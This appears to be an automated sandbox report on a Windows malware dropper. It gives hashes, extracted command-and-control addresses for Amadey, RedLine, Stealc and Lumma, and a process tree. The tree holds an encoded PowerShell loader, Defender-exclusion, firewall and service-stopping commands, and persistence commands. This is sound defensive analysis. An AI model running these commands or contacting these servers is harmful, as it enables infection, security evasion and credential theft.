Analysis

  • max time kernel
    11s
  • max time network
    88s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-05-2024 02:02

Errors

Reason
Machine shutdown

General

  • Target

    b1b7cc600c87f314a20d14a8657181e6577d163d333a503c3a366da53212b282.exe

  • Size

    1.8MB

  • MD5

    4bd3e99486ffbbd065656e0300d56c3e

  • SHA1

    d65965f613f83d235f0bfcabea5505a7c547eeca

  • SHA256

    b1b7cc600c87f314a20d14a8657181e6577d163d333a503c3a366da53212b282

  • SHA512

    856330451d808359d077c05387eac0a5b97f331e8abcb14a57f40887577d3905718b4263ada0c82af1284cba57d9da375e2827311736a56a3dcc27f7e63d0ee9

  • SSDEEP

    49152:jzn259kIST2OIxVfd3T3ndRd/qwNqD4JId+6nYKHR:ja59tSKOYVf1TfRYD4J0+W3

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://5.42.96.7

Attributes
  • install_dir

    7af68cdb52

  • install_file

    axplons.exe

  • strings_key

    e2ce58e78f631ed97d01fe7b70e85d5e

  • url_paths

    /zamo7h/index.php

rc4.plain

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://49.13.229.86

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

lumma

C2

https://zippyfinickysofwps.shop/api

https://acceptabledcooeprs.shop/api

https://obsceneclassyjuwks.shop/api

https://miniaturefinerninewjs.shop/api

https://sweetsquarediaslw.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 29 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • XMRig Miner payload 4 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 12 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 25 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b1b7cc600c87f314a20d14a8657181e6577d163d333a503c3a366da53212b282.exe
    "C:\Users\Admin\AppData\Local\Temp\b1b7cc600c87f314a20d14a8657181e6577d163d333a503c3a366da53212b282.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2200
    • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
      "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1608
      • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
        "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:3920
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4620
          • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
            "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:4792
          • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
            "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
            5⤵
            • Blocklisted process makes network request
            • Executes dropped EXE
            • Modifies system certificate store
            PID:2724
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
            5⤵
              PID:5448
              • C:\Windows\SysWOW64\choice.exe
                choice /C Y /N /D Y /T 3
                6⤵
                  PID:352
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3920 -s 336
              4⤵
              • Program crash
              PID:4704
          • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:1476
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              4⤵
                PID:3140
            • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
              "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
              3⤵
              • Executes dropped EXE
              PID:2036
            • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
              "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Suspicious use of WriteProcessMemory
              PID:4704
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                4⤵
                  PID:1516
                  • C:\Windows\SysWOW64\sc.exe
                    Sc stop GameServerClient
                    5⤵
                    • Launches sc.exe
                    PID:992
                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                    GameService remove GameServerClient confirm
                    5⤵
                      PID:4796
                    • C:\Windows\SysWOW64\sc.exe
                      Sc delete GameSyncLink
                      5⤵
                      • Launches sc.exe
                      PID:3428
                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                      GameService remove GameSyncLink confirm
                      5⤵
                        PID:2056
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                        5⤵
                          PID:2948
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService start GameSyncLink
                          5⤵
                            PID:2348
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                          4⤵
                            PID:1332
                            • C:\Windows\SysWOW64\sc.exe
                              Sc stop GameServerClientC
                              5⤵
                              • Launches sc.exe
                              PID:1276
                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                              GameService remove GameServerClientC confirm
                              5⤵
                                PID:2684
                              • C:\Windows\SysWOW64\sc.exe
                                Sc delete PiercingNetLink
                                5⤵
                                • Launches sc.exe
                                PID:3632
                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                GameService remove PiercingNetLink confirm
                                5⤵
                                  PID:620
                                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                  GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                  5⤵
                                    PID:4852
                                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                    GameService start PiercingNetLink
                                    5⤵
                                      PID:3440
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                                    4⤵
                                      PID:2548
                                      • C:\Windows\SysWOW64\sc.exe
                                        Sc delete GameSyncLinks
                                        5⤵
                                        • Launches sc.exe
                                        PID:3324
                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                        GameService remove GameSyncLinks confirm
                                        5⤵
                                          PID:4796
                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                          GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                          5⤵
                                            PID:3384
                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                            GameService start GameSyncLinks
                                            5⤵
                                              PID:1528
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                            4⤵
                                              PID:6132
                                          • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
                                            3⤵
                                              PID:4876
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                4⤵
                                                  PID:3916
                                              • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
                                                3⤵
                                                  PID:2672
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                    4⤵
                                                      PID:4540
                                                  • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
                                                    3⤵
                                                      PID:3152
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
                                                        4⤵
                                                        • Creates scheduled task(s)
                                                        PID:1796
                                                      • C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe"
                                                        4⤵
                                                          PID:4796
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 456
                                                            5⤵
                                                            • Program crash
                                                            PID:5664
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 500
                                                            5⤵
                                                            • Program crash
                                                            PID:5132
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 748
                                                            5⤵
                                                            • Program crash
                                                            PID:5516
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 768
                                                            5⤵
                                                            • Program crash
                                                            PID:5776
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 768
                                                            5⤵
                                                            • Program crash
                                                            PID:5408
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 840
                                                            5⤵
                                                            • Program crash
                                                            PID:5976
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 1008
                                                            5⤵
                                                            • Program crash
                                                            PID:5084
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 796
                                                            5⤵
                                                            • Program crash
                                                            PID:5720
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 1312
                                                            5⤵
                                                            • Program crash
                                                            PID:4596
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "dl.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe" & exit
                                                            5⤵
                                                              PID:5420
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /im "dl.exe" /f
                                                                6⤵
                                                                • Kills process with taskkill
                                                                PID:5664
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 1280
                                                              5⤵
                                                              • Program crash
                                                              PID:5644
                                                          • C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe"
                                                            4⤵
                                                              PID:5280
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 372
                                                                5⤵
                                                                • Program crash
                                                                PID:540
                                                            • C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
                                                              4⤵
                                                                PID:4268
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -nologo -noprofile
                                                                  5⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  PID:3532
                                                                • C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
                                                                  5⤵
                                                                    PID:2444
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -nologo -noprofile
                                                                      6⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      PID:5636
                                                                • C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe"
                                                                  4⤵
                                                                    PID:5500
                                                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                      5⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      PID:5636
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                      5⤵
                                                                        PID:5848
                                                                        • C:\Windows\system32\wusa.exe
                                                                          wusa /uninstall /kb:890830 /quiet /norestart
                                                                          6⤵
                                                                            PID:3580
                                                                        • C:\Windows\system32\sc.exe
                                                                          C:\Windows\system32\sc.exe stop UsoSvc
                                                                          5⤵
                                                                          • Launches sc.exe
                                                                          PID:5828
                                                                    • C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
                                                                      3⤵
                                                                        PID:3924
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABFAEMALAAgADAAeAA2AEYALAAgADAAeAAzADYALAAgADAAeAAwAEUALAAgADAAeAAyAEMALAAgADAAeAA0ADYALAAgADAAeAAwADMALAAgADAAeAA4AEMALAAgADAAeABCADUALAAgADAAeABGAEYALAAgADAAeAAxADAALAAgADAAeABBADUALAAgADAAeAAyADUALAAgADAAeAA4AEIALAAgADAAeAAxAEIALAAgADAAeAA3ADkALAAgADAAeABCAEMALAAgADAAeABBADUALAAgADAAeAAzADkALAAgADAAeAA0ADgALAAgADAAeABFADIALAAgADAAeAA2ADIALAAgADAAeAA4ADUALAAgADAAeAAyADgALAAgADAAeAAzADcALAAgADAAeABCAEYALAAgADAAeAA0ADEALAAgADAAeABBAEQALAAgADAAeAAxADgALAAgADAAeAAxADYALAAgADAAeAA5AEMALAAgADAAeAAwAEQAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADUARgAsACAAMAB4AEYAQwAsACAAMAB4ADgAQwAsACAAMAB4ADcAQwAsACAAMAB4ADMAOQAsACAAMAB4ADcANQAsACAAMAB4ADAAOQAsACAAMAB4AEYAQwAsACAAMAB4AEIAOQAsACAAMAB4ADcAMQAsACAAMAB4AEYAQwAsACAAMAB4AEUAQgAsACAAMAB4ADQAQQAsACAAMAB4AEUARQAsACAAMAB4AEIARgAsACAAMAB4ADcANgApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                                                                          4⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          PID:5164
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                                            5⤵
                                                                              PID:5476
                                                                              • C:\Users\Admin\Pictures\M7kAoKwH26jCnai6KEB40S6b.exe
                                                                                "C:\Users\Admin\Pictures\M7kAoKwH26jCnai6KEB40S6b.exe"
                                                                                6⤵
                                                                                  PID:6004
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 452
                                                                                    7⤵
                                                                                    • Program crash
                                                                                    PID:448
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 476
                                                                                    7⤵
                                                                                    • Program crash
                                                                                    PID:5524
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 764
                                                                                    7⤵
                                                                                    • Program crash
                                                                                    PID:5268
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 784
                                                                                    7⤵
                                                                                    • Program crash
                                                                                    PID:3028
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 784
                                                                                    7⤵
                                                                                    • Program crash
                                                                                    PID:4320
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 816
                                                                                    7⤵
                                                                                    • Program crash
                                                                                    PID:1464
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 968
                                                                                    7⤵
                                                                                    • Program crash
                                                                                    PID:956
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 988
                                                                                    7⤵
                                                                                    • Program crash
                                                                                    PID:5700
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 1068
                                                                                    7⤵
                                                                                    • Program crash
                                                                                    PID:540
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 1348
                                                                                    7⤵
                                                                                    • Program crash
                                                                                    PID:5676
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "M7kAoKwH26jCnai6KEB40S6b.exe" /f & erase "C:\Users\Admin\Pictures\M7kAoKwH26jCnai6KEB40S6b.exe" & exit
                                                                                    7⤵
                                                                                      PID:3616
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 1452
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:1892
                                                                                  • C:\Users\Admin\Pictures\CiLdaq2oFf22HMahiB3QPFgE.exe
                                                                                    "C:\Users\Admin\Pictures\CiLdaq2oFf22HMahiB3QPFgE.exe"
                                                                                    6⤵
                                                                                      PID:4716
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -nologo -noprofile
                                                                                        7⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        PID:5640
                                                                                      • C:\Users\Admin\Pictures\CiLdaq2oFf22HMahiB3QPFgE.exe
                                                                                        "C:\Users\Admin\Pictures\CiLdaq2oFf22HMahiB3QPFgE.exe"
                                                                                        7⤵
                                                                                          PID:1104
                                                                                      • C:\Users\Admin\Pictures\iiAROFRkJH4ADu0n6kCCIftZ.exe
                                                                                        "C:\Users\Admin\Pictures\iiAROFRkJH4ADu0n6kCCIftZ.exe"
                                                                                        6⤵
                                                                                          PID:3056
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -nologo -noprofile
                                                                                            7⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            PID:2544
                                                                                          • C:\Users\Admin\Pictures\iiAROFRkJH4ADu0n6kCCIftZ.exe
                                                                                            "C:\Users\Admin\Pictures\iiAROFRkJH4ADu0n6kCCIftZ.exe"
                                                                                            7⤵
                                                                                              PID:5920
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 360
                                                                                                8⤵
                                                                                                • Program crash
                                                                                                PID:5260
                                                                                          • C:\Users\Admin\Pictures\1GMyqQc20kDmCNa2K1WoZT9D.exe
                                                                                            "C:\Users\Admin\Pictures\1GMyqQc20kDmCNa2K1WoZT9D.exe"
                                                                                            6⤵
                                                                                              PID:5720
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -nologo -noprofile
                                                                                                7⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                PID:6140
                                                                                            • C:\Users\Admin\Pictures\eyg4unUs8CDTFvdORqH9ai5c.exe
                                                                                              "C:\Users\Admin\Pictures\eyg4unUs8CDTFvdORqH9ai5c.exe" /s
                                                                                              6⤵
                                                                                                PID:3648
                                                                                              • C:\Users\Admin\Pictures\2oKCsU0g0Yn4HScbghkJuNT5.exe
                                                                                                "C:\Users\Admin\Pictures\2oKCsU0g0Yn4HScbghkJuNT5.exe"
                                                                                                6⤵
                                                                                                  PID:596
                                                                                                  • C:\Users\Admin\Pictures\2oKCsU0g0Yn4HScbghkJuNT5.exe
                                                                                                    "C:\Users\Admin\Pictures\2oKCsU0g0Yn4HScbghkJuNT5.exe"
                                                                                                    7⤵
                                                                                                      PID:5824
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -nologo -noprofile
                                                                                                        8⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        PID:5960
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                                                                        8⤵
                                                                                                          PID:3504
                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                            netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                                                            9⤵
                                                                                                            • Modifies Windows Firewall
                                                                                                            PID:3456
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -nologo -noprofile
                                                                                                          8⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          PID:1488
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -nologo -noprofile
                                                                                                          8⤵
